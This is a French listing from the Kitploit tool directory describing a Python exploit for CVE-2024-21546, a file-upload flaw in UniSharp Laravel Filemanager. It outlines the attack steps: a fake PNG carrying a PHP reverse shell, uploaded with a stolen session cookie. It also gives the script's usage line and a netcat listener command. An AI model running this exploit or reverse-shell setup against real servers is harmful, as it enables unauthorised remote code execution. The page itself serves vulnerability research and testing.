Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-21546 — Ce script d'exploitation Python cible un gestionnaire de fichiers Laravel vulnérable créé par UniSharp, qui permet aux utilisateurs authentifiés de contourner les restrictions de fichiers et de télécharger des fichiers malveillants. Cela peut conduire à une exécution de code à distance (RCE) lorsque la charge utile téléchargée est déclenchée. | Kitploit
Outils/GitHubGitHub/ajdumanhug/cve-2024-21546
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubajdumanhug/cve-2024-21546

CVE-2024-21546

Voir le dépôt
511il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce script d'exploitation Python cible un gestionnaire de fichiers Laravel vulnérable créé par UniSharp, qui permet aux utilisateurs authentifiés de contourner les restrictions de fichiers et de télécharger des fichiers malveillants. Cela peut conduire à une exécution de code à distance (RCE) lorsque la charge utile téléchargée est déclenchée.

Partager

CVE-2024-21546 Exploit Python

🔥 Description

Ce script d'exploit Python cible un gestionnaire de fichiers Laravel vulnérable créé par UniSharp, qui permet aux utilisateurs authentifiés de contourner les restrictions de fichiers et de télécharger des fichiers malveillants. Cela peut conduire à une exécution de code à distance (RCE) lorsque la charge utile téléchargée est déclenchée.

L'exploit effectue les opérations suivantes :

  • Valide le laravel_session fourni par l'utilisateur
  • Extrait le _token CSRF via une expression régulière
  • Télécharge un faux fichier PNG contenant une charge utile de reverse shell PHP
  • Déclenche le fichier téléchargé

⚠️ Versions affectées

Version 2.9.1 et versions antérieures

⚙️ Utilisation

root@kitploit:~
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>

Important : Démarrez votre écouteur avant d'exécuter le script :

root@kitploit:~
nc -lvnp <listener_port>

💻 Exemple d'exécution

image

ℹ️ Références

  • CVE-2024-21546
  • RCE via téléchargement de shell sur Unisharp Laravel Filemanager
  • Commit 8170760
Télécharger l’outil